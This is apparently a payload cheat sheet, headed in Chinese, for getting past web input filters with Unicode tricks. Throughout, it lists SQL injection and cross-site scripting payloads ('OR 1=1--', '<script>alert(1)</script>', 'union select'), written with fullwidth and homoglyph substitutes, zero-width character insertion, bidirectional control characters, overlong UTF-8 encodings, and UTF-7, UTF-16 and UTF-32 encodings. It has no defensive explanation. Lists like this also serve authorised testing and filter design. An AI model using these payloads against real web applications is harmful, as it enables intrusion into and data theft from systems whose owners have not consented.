# Unicode 绕过
# 全角字符
＇ OR 1=1--
＂ OR 1=1--
＜script＞alert(1)＜/script＞

# 半角转全角
' → ＇ (U+FF07)
" → ＂ (U+FF02)
< → ＜ (U+FF1C)
> → ＞ (U+FF1E)
/ → ／ (U+FF0F)

# 同形字符 (Homoglyph)
' → ʼ (U+02BC)
' → ʻ (U+02BB)
' → ′ (U+2032)
" → ″ (U+2033)
< → ‹ (U+2039)
> → › (U+203A)
/ → ⁄ (U+2044)
\ → ∖ (U+2216)

# 组合字符
a + ̈ = ä
o + ̈ = ö
e + ́ = é

# 零宽字符
​ (U+200B) 零宽空格
‌ (U+200C) 零宽非连接符
‍ (U+200D) 零宽连接符
⁠ (U+2060) 词连接符
 (U+FEFF) 零宽非断空格

# 插入零宽字符
al​ert(1)
un​ion se​lect
<sc​ript>

# 方向控制字符
‮ (U+202E) 从右到左覆盖
‭ (U+202D) 从左到右覆盖
‪ (U+202A) 从左到右嵌入
‫ (U+202B) 从右到左嵌入

# 变体选择符
︀ (U+FE00) - ️ (U+FE0F)

# 标签字符
󠀁 (U+E0001) - 󠁿 (U+E007F)

# 私用区
 (U+E000) -  (U+F8FF)

# 代理对
%ED%A0%80 - %ED%BF%BF (高代理)
%ED%B0%80 - %ED%BF%BF (低代理)

# 过长编码
%C0%AF = /
%C0%AE = .
%C1%9C = \
%C0%27 = '
%C0%A7 = '
%E0%80%A7 = '
%F0%80%80%A7 = '

# UTF-7
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
+ACc- OR 1=1--

# UTF-16
%FF%FE'%00 %00O%00R%00 %001%00=%001%00--%00

# UTF-32
%FF%FE%00%00'%00%00%00
